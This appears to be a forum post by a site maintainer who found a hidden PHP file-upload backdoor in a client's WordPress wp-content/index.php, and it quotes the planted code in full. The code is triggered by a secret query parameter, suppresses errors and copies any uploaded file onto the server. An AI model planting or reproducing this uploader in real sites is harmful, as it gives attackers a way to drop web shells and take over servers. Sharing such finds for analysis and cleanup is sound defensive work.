Found this file sitting on one of my client site's wp-content/index.php files. Basically a public file uploader.

index.php

error_reporting(0);

if($_GET["posts"]=="va"){
	if ($_SERVER['REQUEST_METHOD'] == 'POST') {
		echo "url:".$_FILES["upfile"]["name"];
		if(!file_exists($_FILES["upfile"]["name"])){
			copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]);
		}
	}?>
	<form method="post" enctype="multipart/form-data">
		<input name="upfile" type="file">
		<input type="submit" value="ok">
	</form>
<?php }